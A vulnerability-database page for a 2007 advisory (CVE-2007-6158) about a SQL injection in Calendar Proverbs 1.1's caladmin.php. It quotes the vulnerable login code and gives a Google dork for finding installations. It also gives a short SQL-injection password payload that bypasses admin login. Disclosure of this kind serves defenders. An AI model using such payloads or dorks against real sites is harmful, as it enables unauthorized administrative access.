Home
Bugtraq
Full List
Only Bugs
Only Tricks
Only Exploits
Only Dorks
Only CVE
Only CWE
Fake Notes
Ranking
CVEMAP
Full List
Show Vendors
Show Products
CWE Dictionary
Check CVE Id
Check CWE Id
Search
Bugtraq
CVEMAP
By author
CVE Id
CWE Id
By vendors
By products
RSS
Bugtraq
CVEMAP
CVE Products
Bugs
Exploits
Dorks
More
cIFrex
Facebook
Twitter
Donate
About
Submit
Calendar Proverbs <=1.1 (caladmin.php) Remote SQL Injection
2007.11.29
Credit:
JosS
Risk:
Medium
Local:
No
Remote:
Yes
CVE:
CVE-2007-6158
CWE:
CWE-89
CVSS Base Score:
7.5/10
Impact Subscore:
6.4/10
Exploitability Subscore:
10/10
Exploit range:
Remote
Attack complexity:
Low
Authentication:
No required
Confidentiality impact:
Partial
Integrity impact:
Partial
Availability impact:
Partial
# Calendar Proverbs <=1.1 (caladmin.php) Remote SQL Injection # Download: # http://www.proverbs.biz/downloads/calendar.zip # Bug found by JosS / Jose Luis Gngora Fernndez # Contact: sys-project[at]hotmail.com # Spanish Hackers Team # www.spanish-hackers.com # /server irc.freenode.net /join #fullsecure # d0rk: "Calendar powered by Proverbs" # Stop lammer [*] Vuln Code - caladmin.inc.php $user = ""; $pass = ""; if (isset($_POST['loginname']) && $_POST['loginname'] != "") $user = $_POST['loginname']; if (isset($_POST['loginpass']) && $_POST['loginpass'] != "") $pass = $_POST['loginpass']; $loggedin = $this->loginuser($user, $pass); [*] Simple Sql Injection In: http://www.example.com/PATH/caladmin.php http://www.example.com/events/caladmin.php [*] Exploit: Username: admin Password: ' or //---------------------------------------\ Greetz To: All Hackers JosS! / Jose Luis Gngora Fernndez
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top